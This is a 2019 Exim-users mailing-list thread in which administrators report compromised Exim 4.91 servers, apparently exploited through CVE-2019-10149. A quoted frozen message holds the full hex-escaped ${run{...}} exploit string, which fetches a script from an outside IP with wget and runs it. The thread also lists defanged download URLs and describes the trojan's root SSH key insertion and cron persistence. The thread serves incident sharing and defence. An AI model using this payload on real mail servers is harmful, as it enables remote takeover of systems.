I googled 'an7kmd2wp4xo7hpr'
I came across
https://forums.zimbra.org/viewtopic.php?t=65932&start=120#p290739
Looks like Zimbra (I suppose / assume any MTA), is being "probed" and
pertaining to CVE-2019-9670
Regards
Brent
On 2019/06/11 14:46, Konstantin Boyandin via Exim-users wrote:
> Hi Calum,
>
> Similarly, one of my honeypot VMs running exposed Exim 4.91 has been
> attacked yesterday by similar means. The attacker, in my case, tried to
> download and execute one of the below (I excluded scheme prefix from links):
>
> an7kmd2wp4xo7hpr dot tor2web dot su/src/ldm
> an7kmd2wp4xo7hpr dot tor2web dot io/src/ldm
> an7kmd2wp4xo7hpr dot onion dot sh/src/ldm
>
> The script (ldm) itself is quite non-professional and buggy - the VM
> wasn't available via SSH, thus the attack only resulted in copying RSA
> key of would-be hacker to root' authorized keys and inserting cron tasks
> to re-attempt the above.
>
> I don't know where to report such things. To malware/antivirus
> manufacturers, perhaps?
>
> But the proper question is, IMHO, "why I haven't hardened my Exim
> installations while I could".
>
> Sincerely,
> Konstantin
>
> Calum Mackay via Exim-users писал 2019-06-11 07:10:
>> hi all,
>>
>> My mail system has just been hacked; it's running Debian unstable exim
>> 4.91-9
>>
>> Could it be CVE-2019-10149? I don't see any reports of active exploits
>> yet.
>>
>> The reasons I suspect exim involvement:
>>
>> • starting today, every 5 mins getting frozen messages:
>>
>> The following address(es) have yet to be delivered:
>>
>>
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>> Too many "Received" headers - suspected mail loop
>>
>> • the trojan horse scripts, that were successfully installed on my
>> system, with root access, are all group Debian-exim
>>
>>
>> Luckily, it looks like the trojans did nothing more than repeated
>> attempts to open up my ssh server to root logins, which I think (and
>> hope) didn't actually work, so I may have been lucky, and the damage
>> isn't widespread.
>>
>>
>> ought I to be reporting this anywhere?
>>
>>
>> thanks,
>> calum.
>
>
>